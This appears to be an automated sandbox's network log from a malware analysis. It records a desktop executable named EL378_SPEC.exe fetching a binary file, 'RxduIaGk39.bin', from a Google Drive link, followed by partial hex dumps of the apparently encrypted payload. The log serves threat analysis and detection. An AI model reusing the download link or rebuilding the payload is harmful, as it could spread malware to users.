2023-08-14 11:02:43 UTC	0	OUT	GET /uc?export=download&id=1D_9oqJiGYaSSAotT1jhvlTKnlBW6kFZ7 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Host: drive.google.com Cache-Control: no-cache
2023-08-14 11:02:43 UTC	0	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 14 Aug 2023 11:02:43 GMT Location: https://doc-0s-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ae4lec2dabnitj2jvlgqqqopjkuhsigr/1692010950000/14086511519431277494//1D_9oqJiGYaSSAotT1jhvlTKnlBW6kFZ7?e=download&uuid=96b46cb3-625e-4dba-8c88-a20b446aff4c Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-SSXbb3yvU4922BvQhwAFTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version= Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49934	142.250.185.97	443	C:\Users\user\Desktop\EL378_SPEC.exe

Timestamp	kBytes transferred	Direction	Data
2023-08-14 11:02:43 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ae4lec2dabnitj2jvlgqqqopjkuhsigr/1692010950000/14086511519431277494/*/1D_9oqJiGYaSSAotT1jhvlTKnlBW6kFZ7?e=download&uuid=96b46cb3-625e-4dba-8c88-a20b446aff4c HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Cache-Control: no-cache Host: doc-0s-as-docs.googleusercontent.com Connection: Keep-Alive
2023-08-14 11:02:43 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdtQJgXT8lA9cvWivrRLW2mZ-4b9DMY79TYs3BEaLZ9xHrsHcPkqulfWrDPXsQW67gA5-uff1yOczyGPdrfVDFAy6f33v6f1 X-Content-Type-Options: nosniff Content-Type: application/octet-stream Content-Disposition: attachment; filename="RxduIaGk39.bin"; filename=UTF-8''RxduIaGk39.bin Access-Control-Allow-Origin: Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 106560 Last-Modified: Wed, 09 Aug 2023 05:38:27 GMT Date: Mon, 14 Aug 2023 11:02:43 GMT Expires: Mon, 14 Aug 2023 11:02:43 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=ko8bpg== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-08-14 11:02:43 UTC	6	IN	Data Raw: 95 b2 ed fa 1b 3e 6a bb c7 df d3 dd 67 0c 22 22 6a b5 7f 63 d7 37 18 9f 37 e3 04 ee b8 e2 fa 43 14 00 0b eb 31 da 01 74 25 c6 d0 c6 94 a7 20 27 68 53 9a 0e a2 a4 61 9e 1a cc 1f 57 11 5b eb a2 49 ea 78 5e 52 67 ac 35 fa 3f ec 90 5f de f7 fb ff 8f f8 5b ec 40 03 1e 4c 43 6d e8 cf eb c0 8e 66 fa 65 f6 45 11 86 19 14 a0 4b b0 15 9e e8 29 8a 0b 68 33 6f 7d 9d e0 9f de e0 c9 57 2a d3 d3 be d7 97 bd b3 4b 3b 62 6e 6c 8f 0d 45 a7 74 c3 15 82 4a 16 1b 8c db 18 e6 cb a9 83 fc 90 81 69 54 7e 0e 9f 81 95 9c d9 6c 9a 0b 5e 37 62 5b 40 40 09 12 f7 17 a6 26 0d 48 63 03 1f e3 73 dc 9b bd f2 75 52 37 46 92 2e 3a d2 69 7f e3 ea c7 d0 69 a9 f9 c5 8b 5f 7a c4 2d 11 95 f2 35 2a 8d 3f ef 33 e4 92 de de f2 99 c2 23 fd 41 f4 a6 4b b8 25 a6 5d bc 7b 12 1e 94 4e 2a a6 ac 77 a8 dd Data Ascii: >jg""jc77C1t% 'hSaW[Ix^Rg5?_[@LCmfeEK)h3o}WK;bnlEtJiT~l^7b[@@&HcsuR7F.:ii_z-5?3#AK%]{N*w
2023-08-14 11:02:43 UTC	10	IN	Data Raw: 0a 02 8b 11 ec e4 ae f1 3f 47 4b 6c d5 78 bb 26 83 a1 a0 93 6c d2 c4 52 d3 ac 8f 19 54 ec 33 5a b5 51 60 b9 25 3e f1 74 86 17 41 a4 3b b7 20 8d 6b bc 8a dd 12 cd 3d 7e 83 10 f3 07 f5 3f 00 38 69 1b f1 3d 18 99 b2 48 a9 ea 87 48 e2 3c c7 2f 58 32 c9 2a 7e d2 81 78 e2 b1 7b 33 40 72 54 eb 1f d8 42 31 be 04 91 e2 db 08 d6 06 70 3b 3e 58 15 dc bb 1c d6 28 6f 21 36 3c 0e 3a e2 8a a1 28 cc 23 08 e0 e3 42 30 6e de cc 69 24 3e 11 ec a3 4c 6c 9f 72 47 65 67 3c d6 1c fd 0a 7b d3 33 d6 ac fb 45 e4 55 f6 20 55 b3 88 e9 67 1b af d8 58 15 89 ed f8 da 14 1b 25 20 ce a1 9a 87 c1 91 3a 25 cd 1c b1 93 17 8e 02 33 a2 0e ae db 36 26 c0 dd cc f0 48 90 1b 6c 97 04 e8 89 53 14 06 82 c9 4a 17 6f 01 14 45 ee 09 cb ac e1 72 c1 6b 40 ec c9 08 65 16 fb b4 17 f9 cf f1 4b d1 28 ce b8 Data Ascii: ?GKlx&lRT3ZQ`%>tA; k=~?8i=HH</X2*~x{3@rTB1p;>X(o!6<:(#B0ni$>LlrGeg<{3EU UgX% :%36&HlSJoErk@eK(
2023-08-14 11:02:43 UTC	14	IN	Data Raw: 7d ae 3e ec f6 0d 61 47 e7 b8 8a ce 6c 1f 4a 1f 04 45 a3 da 4b 41 0e f0 f3 b0 e3 f7 89 1b 88 a9 e0 df 0f 51 1e a9 74 9f 7e 40 80 54 d5 86 29 49 35 1c ea 8b 40 e5 4c fe 2f 52 c8 9d d3 37 77 52 39 9b c5 9d bf 77 97 09 c7 fe 3b 55 12 72 e7 2b 09 a8 f4 b1 e4 f7 8e 15 76 f7 fa 04 46 18 68 ca c2 f0 59 fc 30 06 c8 a5 37 89 01 79 4e 30 0b 29 3c ce 20 3b 48 4b 01 d8 a5 0d f0 7d af 65 c5 6d fb c3 98 37 08 6e fe 48 30 1c fa a2 92 68 be 7f 4a 97 f2 eb 6a 4c a9 91 42 da 92 cf 44 13 d9 8d 25 f0 a1 ae 98 f6 5f ae 67 86 d9 c6 a8 72 e7 b8 70 07 03 86 73 65 97 89 5d 92 17 30 b3 aa bc 39 90 36 90 cc 94 a6 e6 eb 5f 78 70 34 1b ce d6 75 f4 49 b6 45 82 62 1f f9 57 6d dd 58 d5 2c 8a da 97 4b 3a 36 db cd 50 b0 8c e8 c8 0d b2 df 54 83 9b 59 3e 0f 6a 39 5c 78 59 76 d3 5d 98 66 bb Data Ascii: }>aGlJEKAQt~@T)I5@L/R7wR9w;Ur+vFhY07yN0)< ;HK}em7nH0hJjLBD%_grpse]096_xp4uIEbWmX,K:6PTY>j9\xYv]f
2023-08-14 11:02:43 UTC	18	IN	Data Raw: 4d e8 4a 90 83 79 63 51 d1 a2 96 62 e2 7e 71 0f 0c 2a 3a 3c cb 0f a0 ed 84 ab e9 78 0b 24 df 08 38 20 15 ac a8 23 90 e1 e9 c5 77 8c 1f db e9 4e 8d b2 80 a2 20 44 3c 73 f6 83 30 ce a6 e5 83 80 85 c3 11 4d 80 77 82 df 63 64 b4 f7 64 eb 8a 22 d6 a8 b5 e2 13 ce a2 fe b5 00 a7 8f 4c bc 1f 96 6d 65 87 4c fe 37 b2 93 63 d1 4f ea 9c 1b ff f3 a1 3a bf 34 c2 13 b2 44 55 2f d3 6d c2 0b 3c 52 6b d5 30 cd c0 48 42 97 7f 81 96 2f 56 e1 9b 36 1f 12 67 9d 92 c6 f4 c3 a0 16 03 ef d4 45 72 f7 4f 29 6e 9a 00 41 6f fd 5c fc 7a f7 dd 0b c6 42 b3 6a 1b 76 ab 44 d3 ba 00 84 cb 3e de 30 bf 15 72 bf be d9 5b 62 fe e6 cf 59 c8 5b fe 03 01 36 df 34 ff b5 44 b6 5d 7f ab 9e de ec 55 1f 34 ec 83 16 a7 30 53 72 0b f8 e6 dc 6a c6 2e 80 ad b2 55 95 33 ff 17 d3 cd d7 d7 eb b2 5f b8 17 ff Data Ascii: MJycQb~q*:<x$8 #wN D<s0Mwcdd"LmeL7cO:4DU/m<Rk0HB/V6gErO)nAo\zBjvD>0r[bY[64D]U40Srj.U3_
2023-08-14 11:02:43 UTC	19	IN	Data Raw: a7 f1 b9 94 50 0f 3a 19 99 81 53 b6 e6 17 eb 2a de 05 cc c5 f5 54 a4 46 52 ea e1 4c a3 72 5b 7a 23 54 54 8c e0 54 03 4e cb 75 27 db 62 05 88 78 c8 a8 fe ba 5b 2b c3 b8 1e 12 a4 8a e1 b4 3c 9c b2 f7 93 28 4f 83 d4 14 54 35 4a 39 61 d4 88 95 8b a6 e7 84 cc 26 30 cf 42 2c 20 4a 57 e5 96 d1 64 31 8e 5a 19 9d d6 1c 1f a1 ae 57 4c 95 40 08 c7 9e 4f f5 66 de e0 58 dd e3 23 44 ba 17 bc c2 8c 42 fb 49 c1 32 0f 4a 08 c1 19 77 35 44 e3 3a d4 cd df 46 58 a9 e9 e9 9f bc 17 b3 2c cc a2 b7 42 a5 e8 b8 f4 0f 40 44 7a 49 53 9e 5b 85 c3 8f bf d1 cc 9e a7 92 4c ac e3 68 8a 8e 61 22 ef e4 7c 38 cd ae 97 8d c7 20 43 d2 ca 1c 93 2d a7 83 ab 9a 41 a9 40 c9 40 8d 2a e6 b2 a9 b2 f8 1b 67 11 20 ba 76 26 db bd 76 83 17 d4 3a 8a c1 57 9d 9e b6 cc 62 8d 97 8c 6b 55 35 f7 ee df e6 15 Data Ascii: P:STFRLr[z#TTTNu'bx[+<(OT5J9a&0B, JWd1ZWL@OfX#DBI2Jw5D:FX,B@DzIS[Lha"\|8 C-A@@g v&v:WbkU5
2023-08-14 11:02:43 UTC	20	IN	Data Raw: ff b6 06 7a 62 4d 8f b8 8a a6 76 c6 83 79 f5 ee 1a cb 38 fc d5 d9 ef 23 e1 d7 83 02 92 4c e4 89 15 b1 c2 41 e9 26 d0 c1 14 e4 bd b1 6c 95 5b a8 0d cb d7 6e e7 40 51 bd f0 9a 48 b2 7e 8f ee 0a 66 26 fb d6 a6 78 11 04 7e 0d 24 1f fd d4 f9 4e 7b 21 95 0c 83 66 f1 c4 49 4b 81 ec 79 e8 8c 6c eb 01 af be 15 ed f5 f9 59 4b c3 82 6c f9 fa ad 9a 0a 29 9f 68 ff 08 88 c7 0d 77 21 94 ea 92 e6 63 1a a7 7b 84 0b 0f 37 74 39 a7 ed d8 8d c9 01 41 af 79 f1 ab 72 72 0c 71 9e bb b2 f1 16 1c 08 f9 f3 77 9a 61 1f 7a 85 69 f6 21 57 7f 6a ff 50 cc 79 2e 6f 35 e9 88 90 f8 d3 e3 78 68 4e 38 67 cb 49 b1 29 c2 15 bb e4 57 46 3d f8 f5 d1 9d 18 28 62 eb d5 ab 5f 1f a3 11 58 15 26 62 f6 6d 39 4a ea fd fc 63 c1 16 de 1e fd fc eb 53 9e 41 4d f5 f5 a7 b6 bc 48 72 33 cb f4 35 6e 1a 9c d8 Data Ascii: zbMvy8#LA&l[n@QH~f&x~$N{!fIKylYKl)hw!c{7t9Ayrrqwazi!WjPy.o5xhN8gI)WF=(b_X&bm9JcSAMHr35n
2023-08-14 11:02:43 UTC	21	IN	Data Raw: a2 fb aa 63 32 5e 4e 71 9e 8d bc a1 d9 f4 0d 57 ec 35 9d 64 1e 2f 25 96 f6 f2 f0 8d e3 a2 41 26 1b a7 db e1 5d a9 e9 9b fd d0 76 79 75 3c 48 2f ca fe 28 40 48 2b 9b 81 b5 d2 ea 50 8c 15 0f 85 7e 6f 64 85 b6 41 f5 5b 42 e7 cf 6d fe af 3a 04 5a 53 da 42 f5 2b dc 98 b7 f3 06 ce 62 51 c2 e1 1b 3c c8 08 f8 89 5e de 22 7e 4c 9e 09 7e 94 95 32 1e 7c 66 10 96 9f 38 21 ef 9d a9 0a fa 01 68 c4 87 d6 b6 06 56 80 33 e5 01 38 44 db ca 81 90 83 c8 89 ad 92 79 36 36 d8 dc cf 3d ee fd 92 6c ff 17 34 5a 82 47 8e ca 2d d6 22 61 d4 a3 c7 e2 5d 85 c6 eb b6 0b 9d 2c 1f 7a 23 69 a1 d9 01 f3 b9 80 e2 b8 a5 b8 2f 7c a4 3c f9 c7 9a dd 3b 0c b3 c5 61 00 66 66 44 39 e2 1a 54 bf 69 90 cf 7d 70 f2 87 02 b5 3d 59 40 33 26 63 36 70 5f 85 30 bb 64 bb 14 f0 d3 9d 2d 9f 27 48 f2 b4 1d 1a Data Ascii: c2^NqW5d/%A&]vyu<H/(@H+P~odA[Bm:ZSB+bQ<^"~L~2\|f8!hV38Dy66=l4ZG-"a],z#i/\|<;affD9Ti}p=Y@3&c6p_0d-'H
2023-08-14 11:02:43 UTC	22	IN	Data Raw: 6f d0 75 8f ad b7 e2 c0 e8 00 33 24 bc 50 21 48 f4 bd fb 3d 72 9a 1e 63 0d a5 09 85 13 91 ec 84 e1 38 28 63 eb 19 04 95 86 c9 a4 83 38 31 9c fb 8e 15 4c 76 cb 50 34 ee eb fd e6 ab 0e ef 93 d1 5b d1 e6 64 90 a5 7e cd 56 43 35 60 4c 48 6a 29 3a 07 80 dd 94 73 5c 84 a5 a8 10 9a 53 16 ec 96 c0 d9 44 c1 91 aa 52 5f ec f9 80 3f 84 89 ea 4a c1 61 3e e4 da df 40 78 60 75 6b cb 92 09 be 69 bb 51 fe e8 ae c7 28 85 6a 5a b5 cb 0a 2a 44 de 5f af bf 59 79 6f d1 56 4b 11 7f 00 cd 56 0e 2d e0 21 09 de 0f 7a 63 d4 a3 1d 8b 93 a9 21 ec c6 d4 27 03 57 21 e0 b7 9c 0f 35 9a 20 2a ea c0 d8 1d 1b ca e4 45 29 94 3d 44 16 d5 37 67 eb 80 87 02 24 80 01 fa b0 cf 0e e4 75 5e 11 df 69 a9 b0 96 3f f1 90 f7 1d c6 7b a0 b0 4f b6 8d eb fa d8 8d fd 51 05 08 4e f2 72 a4 8f 8e 76 69 81 68 Data Ascii: ou3$P!H=rc8(c81LvP4[d~VC5`LHj):s\SDR_?Ja>@x`ukiQ(jZD_YyoVKV-!zc!'W!5 E)=D7g$u^i?{OQNrvih
2023-08-14 11:02:43 UTC	24	IN	Data Raw: 70 3e 2f 50 86 c7 45 1f e4 a3 ec 43 da 2c 92 4a 47 5d 72 51 e6 a6 fc 70 01 6f de c5 7f 6d 20 46 aa 7b af ed 2d ab 74 45 8b f0 9b 63 36 23 e8 14 41 4b f9 ac 70 d5 c7 19 f7 89 8b c3 6b 34 ea 2d e6 ef 0d 4c c1 17 02 9d 74 47 1c 40 3e 26 41 44 4f 26 23 93 21 4c ca 53 b8 95 06 5c 38 d7 f3 c4 fa f5 d5 4c 36 5e a0 2e 77 28 df 29 15 7f d7 d4 fa 14 58 cf a1 7d c9 1d b2 df 54 02 c2 91 2e b6 ce 91 45 0f 54 f4 4b 4f a7 2f d6 cb e2 16 f1 ec dc 9f 64 51 6f 1b fe c5 f5 09 c8 c5 cd f1 8b b8 8b a9 4e 45 1c 28 2b 6b b4 5e 4a dc c0 a2 75 23 58 0d af 80 28 68 ec 98 0b 18 a6 dd 19 4a 5e ac 80 bc e0 c3 97 01 66 55 46 a9 45 28 91 c9 71 8c ff 01 83 d7 be 94 01 a3 3e 9f 33 06 51 83 b6 19 13 73 db d9 f4 1b 4f e0 b3 b7 cc 19 78 a1 bf 85 3c b7 7c 05 e9 6f b1 c7 ab ad a1 20 0a c0 4f Data Ascii: p>/PEC,JG]rQpom F{-tEc6#AKpk4-LtG@>&ADO&#!LS\8L6^.w()X}T.ETKO/dQoNE(+k^Ju#X(hJ^fUFE(q>3QsOx<\|o O
2023-08-14 11:02:43 UTC	25	IN	Data Raw: 43 5f de 08 cd af d6 2c a4 13 73 c3 97 12 c0 a9 f4 46 95 c4 ce 39 a4 3e ab 86 44 0d f5 eb d5 5b 4f 60 96 00 38 8a 0b 68 6a 36 fe 65 e1 eb da d3 09 fa e9 8e 3a a6 c8 2d b3 e6 74 de c5 4b 59 cb 4d d8 79 55 a3 94 f4 6a 66 69 60 78 66 da 65 dc 6b 71 7d 92 0a 20 09 18 c3 2a 9a f9 32 b3 87 57 28 f8 58 00 eb 6b 6e 75 55 02 ed 2f 71 65 34 55 f7 dc 8c 23 64 28 66 86 ea b7 e9 82 d4 4d 0b 73 82 83 1b 02 82 17 7c 12 60 81 37 60 5a a6 f2 80 b4 bd b5 5b cd 3f 50 a8 b4 bb 24 6f 41 f3 46 8b 1a 0b 42 0b fd 9e 0f 4b 11 ae 3b c8 4d f2 a8 cd 6e 1b fb 34 48 c5 0d cd a0 d4 b5 0e 2a 9d 8d 1f 97 18 7c bc 5d 0b c9 c5 0b a2 cc 07 79 fc a6 bc 6a db ae c1 a6 a6 e6 45 9f be c5 14 0b b0 5f 1e 2e 9f 35 69 a9 eb c7 9b eb 81 ca aa 99 68 98 7a 84 08 e1 a6 bb d6 54 63 fe d0 4c d9 50 d9 1e Data Ascii: C_,sF9>D[O`8hj6e:-tKYMyUjfi`xfekq} 2W(XknuU/qe4U#d(fMs\|`7`Z[?P$oAFBK;Mn4H\|]yjE_.5ihzTcLP
2023-08-14 11:02:43 UTC	26	IN	Data Raw: 29 c4 03 ba bd 05 b1 83 de 71 92 38 10 ed 68 1b 88 0e 4f 4a 2c d7 00 fd b1 d3 78 56 70 2a e8 f8 9c fc 97 58 b6 81 38 82 31 9a f3 ad 0f 49 f3 e3 77 11 8f a2 6c c3 58 57 d0 95 94 b4 8f 56 f0 e8 34 e6 9f 45 23 22 82 39 57 29 68 b2 d9 d3 73 f8 fc a6 68 07 dc 49 90 d6 90 b6 63 84 74 02 f6 80 34 e1 98 5c 0c 94 ee 83 3a b0 f8 c2 3b d8 e2 87 b8 cf ce a6 45 ea 69 8a 3f 75 39 28 db c0 60 03 18 e4 49 52 58 a7 32 49 ed b4 e8 d9 f7 c7 ac 9d 52 24 1d 37 fe 71 5f 9b 85 f0 98 1c 14 70 fc 0a 20 df 49 22 0a d1 02 a7 00 1a 70 02 c7 b0 a2 d6 f0 79 41 49 a9 4a eb 2f 4b 17 94 a3 eb a3 85 d0 41 2d a4 cd c3 73 b0 64 98 83 ce b9 5e e2 d3 04 89 ad c9 a8 d3 48 7b 7f 4b 94 90 f2 7e a9 4e 4b bf ed b6 9c 77 1d b6 dc 6f 87 ab 71 89 32 35 cb 68 db d9 b5 62 06 65 39 5c b9 4d b0 30 7e 16 Data Ascii: )q8hOJ,xVp*X81IwlXWV4E#"9W)hshIct4\:;Ei?u9(`IRX2IR$7q_p I"pyAIJ/KA-sd^H{K~NKwoq25hbe9\M0~
2023-08-14 11:02:43 UTC	27	IN	Data Raw: 47 77 64 4b bb 1b 7e 87 70 34 32 a0 ca b8 9a e8 e9 59 8d 6c 93 a4 f1 3f 2b f5 d1 c8 d6 80 2a bd fc 51 c8 cc 22 e0 40 7d 1a 03 45 f7 d3 8d 74 62 90 37 7a cc 1e 47 6d 57 5d 04 d3 1e 7c a1 2f c3 3e 4d 90 54 ee 3e 76 08 62 60 fd 12 1e 6b 1d dc 01 72 50 c1 a2 7e de f4 98 8e 82 44 37 6f 26 0c 8e 0e 8b d5 d2 84 d3 51 1d 8a d4 ca 3b 7a 4f b7 48 ef 7b 69 c1 87 da 2e 7e ff 91 d2 61 66 9a 2a db 85 b1 cd 51 99 93 b1 c2 c3 e8 f7 12 7e 97 9c bc b1 b3 f0 87 11 49 0a fa e8 46 d1 0f 40 9c 62 7e 24 2c 5c 55 94 8f 34 c6 55 83 4b 7b 76 0d 97 d4 80 a5 23 45 fc 98 c9 17 5b a6 fa 29 c5 b8 e2 f9 82 5d 80 84 c3 22 95 5f b7 18 62 9d bc 50 32 3a 40 86 b2 6f 96 aa ed 71 86 88 39 db 14 59 0d cf d7 1a 37 d2 14 da 71 ff ce 5f 7d c3 64 c6 ca cd 3b a5 c6 9e 91 2f f6 a3 26 b6 2e d7 12 ab Data Ascii: GwdK~p42Yl?+Q"@}Etb7zGmW]\|/>MT>vb`krP~D7o&Q;zOH{i.~afQ~IF@b~$,\U4UK{v#E[)]"_bP2:@oq9Y7q_}d;/&.
2023-08-14 11:02:43 UTC	29	IN	Data Raw: 67 6b 69 83 e7 15 37 26 33 9e 0c 26 52 e5 69 d5 fc 83 dc 3f ee 4b 7e b3 bf 47 c9 6e 84 55 07 3c 05 f4 10 12 65 2c 87 76 ac b2 13 51 bf 51 04 81 bf 78 b8 b3 20 b4 f6 95 6b 7e 42 7d 02 88 58 1e ff e1 e0 02 b4 fa 39 c8 02 45 b2 7e 6b 73 91 4f e2 e8 50 8a 3f 73 19 b5 a9 04 9a 44 ac f5 fd 99 4f b8 bd e7 a8 a3 5a 95 3c 48 36 44 8d b2 c3 53 fe 28 3e 6f e5 46 62 27 d0 2d f9 26 89 1b 9f fa 16 5c 60 95 75 13 c9 30 d6 f2 c6 d7 cf 9d 79 77 13 ea e9 ab 62 69 f8 70 4b 70 d7 e8 ba df 7a b3 3a 29 d2 f6 34 c1 30 69 84 d1 78 e2 0e 98 c6 4e c8 ce 31 7f cc 07 67 21 de a4 94 29 99 16 f5 c8 32 ca 34 64 80 3d 33 43 78 a3 0a ae 95 f3 ab b0 ac 17 9e a8 5a 6c 59 4e 88 16 75 48 c8 14 40 b9 2a fa 9c 5e ca 49 e7 81 94 d9 82 bd 95 57 6d 7f cc 4e 73 0a e1 66 cd d9 b0 61 37 8d 95 3c ad Data Ascii: gki7&3&Ri?K~GnU<e,vQQx k~B}X9E~ksOP?sDOZ<H6DS(>oFb'-&\`u0ywbipKpz:)40ixN1g!)24d=3CxZlYNuH@*^IWmNsfa7<
2023-08-14 11:02:43 UTC	30	IN	Data Raw: 18 ce 82 d8 88 36 d0 34 16 36 10 0d 2d 1a 92 7e 7f d0 ff 99 a1 36 5c c0 a7 51 12 ca 3c e1 cb 15 29 27 f4 f0 e3 c2 c0 b8 2b 3c 74 bd d4 64 fb 1a a8 e5 bb 23 02 61 4c 14 6d 64 81 ce 90 e7 e4 8e 22 85 76 74 f2 79 20 ba 81 9c bd 0b a0 2c 91 cd e6 82 38 16 00 7b 86 1e 03 3c 7d 1b 36 50 68 e5 c8 83 14 5c 25 1c c7 e8 9c a0 a8 e0 2f e0 b2 ed d3 61 9e d1 40 78 6d da 0d 56 e0 ee a4 86 02 d5 5f 4d 74 d8 dc 72 e5 c2 36 0b 69 b6 a7 35 f6 ad f1 27 5e 75 5f ae b2 f1 df 9d 2e 08 0e 80 b1 79 00 8e 15 b2 60 9f ec 50 6e 12 cb 07 cc a9 21 32 96 51 d3 81 49 cd 54 ee 36 3a cc bf 1a 66 d1 a7 74 01 7f 48 01 25 86 af 65 b1 cb 6f 5a ee 4d 57 7a e4 e2 d1 b5 1f c7 3f c2 73 76 8c 09 d1 e0 73 26 9d d1 f2 6a 08 90 fa ec ca 1a 58 d2 56 51 67 0f bd 5e 7e ec 19 b5 ad 57 ba 47 b4 3e 2e e6 Data Ascii: 646-~6\Q<)'+<td#aLmd"vty ,8{<}6Ph\%/a@xmV_Mtr6i5'^u_.y`Pn!2QIT6:ftH%eoZMWz?svs&jXVQg^~WG>.
2023-08-14 11:02:43 UTC	31	IN	Data Raw: ad 55 89 bf d2 32 c1 5d aa de 57 62 9e 9d a7 3b fa 00 e6 58 11 d0 2e e1 91 71 6e 06 a4 55 50 81 f8 52 00 37 b5 3c ed 07 d5 7d 53 63 35 8a 37 24 d9 4a 7b a2 fd 73 2f b6 06 6e 70 ae a5 d6 4d 71 cc 8b 9f ea 67 0f 92 e0 47 f5 93 05 a3 fa 3b 39 9d 3b a4 f5 da 44 f2 cd 13 a1 ca ad 2f 8a e0 44 df 2b 40 31 f8 ba e3 7f fd 02 4e 39 0f 92 d5 f0 22 94 1b 40 07 06 36 c4 0e ef 80 f2 4c 25 01 35 0e 81 c0 ce ea c7 16 c1 a6 8b de 63 47 1a fc 10 ad 03 f9 6d 75 2a d1 bd d1 9c 02 89 f9 37 c5 7e 80 78 bb c8 74 46 8a a4 5b a2 16 21 b7 d4 ee 71 1e 28 55 f9 23 b5 f4 75 cf 66 d0 49 06 16 d8 46 16 87 67 70 b8 73 87 e8 87 20 c3 3e 39 86 4f 78 e6 df fa 26 f0 76 d7 0e 77 a6 4d 33 15 38 8f 18 